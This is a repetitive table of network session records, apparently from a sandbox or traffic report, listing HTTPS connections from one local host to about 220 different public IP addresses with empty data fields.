                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11520192.168.2.1333216202.167.4.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11521192.168.2.134614290.145.215.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11522192.168.2.1358630218.43.200.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11523192.168.2.134022693.25.239.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11524192.168.2.133730874.21.3.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11525192.168.2.135583848.151.66.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11526192.168.2.135926883.132.79.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11527192.168.2.135332635.66.42.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11528192.168.2.133608845.234.135.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11529192.168.2.1349802196.241.110.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11530192.168.2.1343704181.129.180.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11531192.168.2.1334126167.150.85.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11532192.168.2.1347782186.135.202.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11533192.168.2.1350976208.150.59.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11534192.168.2.135068474.19.134.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11535192.168.2.134118077.200.48.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11536192.168.2.134575647.66.231.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11537192.168.2.1358136199.105.196.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11538192.168.2.1336786107.134.152.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11539192.168.2.13460069.139.139.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11540192.168.2.1356512137.242.70.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11541192.168.2.135399448.203.22.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11542192.168.2.1348272222.211.45.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11543192.168.2.134325034.96.212.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11544192.168.2.1356292112.99.224.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11545192.168.2.1340120198.246.117.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11546192.168.2.1348902109.157.185.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11547192.168.2.1334276101.83.77.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11548192.168.2.133951681.144.162.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11549192.168.2.135040073.35.145.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11550192.168.2.133928825.110.71.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11551192.168.2.1341568148.109.19.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11552192.168.2.134748489.58.170.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11553192.168.2.134821283.186.20.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11554192.168.2.1346406165.18.69.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11555192.168.2.1338026174.126.15.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11556192.168.2.135358266.173.128.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11557192.168.2.1358994121.167.79.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11558192.168.2.1346680205.197.24.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11559192.168.2.133292886.29.251.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11560192.168.2.134503414.245.119.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11561192.168.2.134963468.194.100.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11562192.168.2.134052238.221.152.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11563192.168.2.1346604135.61.163.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11564192.168.2.1338850129.180.186.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11565192.168.2.13381861.165.60.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11566192.168.2.134240687.180.171.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11567192.168.2.1345418170.99.181.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11568192.168.2.1350402216.188.41.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11569192.168.2.135247436.136.215.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11570192.168.2.135562480.59.59.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11571192.168.2.1360014110.203.150.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11572192.168.2.1344594208.182.81.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11573192.168.2.1336202122.250.134.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11574192.168.2.1333774196.30.165.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11575192.168.2.1335114183.166.90.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11576192.168.2.1344762190.88.87.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11577192.168.2.1340732128.80.170.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11578192.168.2.1341056107.184.69.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11579192.168.2.133531480.105.34.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11580192.168.2.133820212.114.84.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11581192.168.2.1357854115.239.38.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11582192.168.2.1347076111.248.222.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11583192.168.2.134051850.159.246.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11584192.168.2.135655848.249.131.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11585192.168.2.135067460.114.7.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11586192.168.2.134722844.55.221.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11587192.168.2.1346424199.140.224.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11588192.168.2.1359804113.61.85.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11589192.168.2.134658038.77.38.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11590192.168.2.135409073.230.98.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11591192.168.2.135482698.224.128.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11592192.168.2.1346926179.226.166.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11593192.168.2.135337844.181.143.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11594192.168.2.134213819.115.120.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11595192.168.2.1358910223.154.234.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11596192.168.2.133673668.150.19.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11597192.168.2.1349780200.255.140.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11598192.168.2.1336642147.115.122.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11599192.168.2.134761045.198.182.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11600192.168.2.133326040.179.208.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11601192.168.2.134447250.176.78.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11602192.168.2.1347756196.76.236.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11603192.168.2.1341970179.130.115.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11604192.168.2.133972437.82.173.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11605192.168.2.1337712149.151.196.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11606192.168.2.1347458179.109.35.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11607192.168.2.1346780191.201.173.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11608192.168.2.1356220153.17.253.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11609192.168.2.134359044.218.145.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11610192.168.2.136097481.143.249.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11611192.168.2.1346198177.177.183.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11612192.168.2.1333578193.130.180.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11613192.168.2.1338926109.151.165.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11614192.168.2.1357972134.19.68.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11615192.168.2.1347736123.121.59.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11616192.168.2.134110266.232.148.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11617192.168.2.133376490.139.244.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11618192.168.2.134998069.125.66.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11619192.168.2.1345496188.105.96.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11620192.168.2.1349838129.109.105.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11621192.168.2.1360876177.227.34.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11622192.168.2.135871096.197.111.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11623192.168.2.134720885.72.42.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11624192.168.2.134687486.132.207.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11625192.168.2.1347190126.40.236.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11626192.168.2.133561065.71.110.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11627192.168.2.1339740203.205.105.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11628192.168.2.134848218.84.168.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11629192.168.2.13441908.75.175.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11630192.168.2.134446862.24.129.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11631192.168.2.1352288209.229.244.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11632192.168.2.1337560207.35.203.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11633192.168.2.1356298194.251.15.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11634192.168.2.133522443.231.235.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11635192.168.2.1356582157.44.231.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11636192.168.2.1350590199.137.251.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11637192.168.2.1335430170.26.208.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11638192.168.2.134400242.241.116.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11639192.168.2.1340960208.186.150.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11640192.168.2.135525487.69.60.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11641192.168.2.134226458.181.246.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11642192.168.2.1354706202.166.152.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11643192.168.2.1350340193.164.28.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11644192.168.2.1343318208.33.245.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11645192.168.2.133487089.22.177.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11646192.168.2.133934618.140.247.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11647192.168.2.1360816188.137.135.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11648192.168.2.133689892.103.205.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11649192.168.2.1356558104.59.216.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11650192.168.2.1343144159.188.53.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11651192.168.2.134580472.68.26.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11652192.168.2.1345144181.206.17.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11653192.168.2.1353322152.246.194.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11654192.168.2.1357410167.131.86.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11655192.168.2.134593014.90.105.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11656192.168.2.1345454172.202.117.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11657192.168.2.1341540141.8.34.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11658192.168.2.1360516221.203.168.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11659192.168.2.1337776101.21.250.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11660192.168.2.1347014203.142.95.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11661192.168.2.134084813.124.244.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11662192.168.2.1342538189.223.152.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11663192.168.2.1348786203.136.246.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11664192.168.2.1345796120.22.27.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11665192.168.2.135578286.103.171.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11666192.168.2.135161818.94.10.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11667192.168.2.133873612.110.124.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11668192.168.2.134567089.60.153.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11669192.168.2.1355526121.55.99.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11670192.168.2.1339532128.2.184.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11671192.168.2.1343196148.208.15.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11672192.168.2.134813825.138.29.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11673192.168.2.134560665.162.142.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11674192.168.2.133627673.55.17.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11675192.168.2.1354804146.200.100.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11676192.168.2.1359914165.73.227.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11677192.168.2.1337002160.158.144.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11678192.168.2.135721064.16.129.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11679192.168.2.1333450184.254.125.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11680192.168.2.135048243.222.129.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11681192.168.2.1339808166.128.118.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11682192.168.2.1347948216.101.53.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11683192.168.2.136006476.214.166.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11684192.168.2.133688898.109.155.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11685192.168.2.1344044153.235.249.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11686192.168.2.1353038179.232.64.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11687192.168.2.134832292.74.14.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11688192.168.2.1333824189.90.6.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11689192.168.2.1357826182.96.219.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11690192.168.2.135334248.73.104.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11691192.168.2.1334198208.66.181.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11692192.168.2.13387145.62.144.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11693192.168.2.1339630179.155.35.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11694192.168.2.135213480.125.247.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11695192.168.2.1333310149.90.222.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11696192.168.2.1332982117.59.12.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11697192.168.2.135911227.111.190.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11698192.168.2.135426057.136.167.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11699192.168.2.135139232.17.90.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11700192.168.2.135595038.183.87.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11701192.168.2.135860280.122.45.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11702192.168.2.1341994119.202.50.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11703192.168.2.133383438.162.44.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11704192.168.2.1345544165.63.104.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11705192.168.2.1336300175.75.191.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11706192.168.2.1343870115.218.18.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11707192.168.2.1342590193.64.48.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11708192.168.2.1356982125.232.192.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11709192.168.2.134818018.41.153.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11710192.168.2.1345204187.120.159.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11711192.168.2.1336058135.95.165.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11712192.168.2.1352664108.66.12.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11713192.168.2.1332914211.104.246.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11714192.168.2.135975898.38.174.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11715192.168.2.1360250164.111.168.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11716192.168.2.1340334223.132.0.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11717192.168.2.1349700168.129.48.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11718192.168.2.134864649.48.76.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11719192.168.2.135932262.124.41.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11720192.168.2.1360666149.111.206.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11721192.168.2.1354276207.171.98.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11722192.168.2.1336540122.157.247.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11723192.168.2.1338160208.228.159.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11724192.168.2.1348158113.191.100.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11725192.168.2.1351804175.106.4.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11726192.168.2.1341928158.227.169.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11727192.168.2.1343932177.76.185.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11728192.168.2.1343280111.21.154.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11729192.168.2.1348952223.223.237.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11730192.168.2.134443692.205.192.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11731192.168.2.1345520201.119.120.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11732192.168.2.1359086123.233.42.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11733192.168.2.1353198180.128.73.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11734192.168.2.136056281.175.162.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11735192.168.2.133550093.9.140.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11736192.168.2.1351672211.73.66.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11737192.168.2.134005663.237.144.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11738192.168.2.1353310172.117.104.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11739192.168.2.134150847.188.206.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11740192.168.2.135560441.74.26.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11741192.168.2.1344808102.99.122.205443
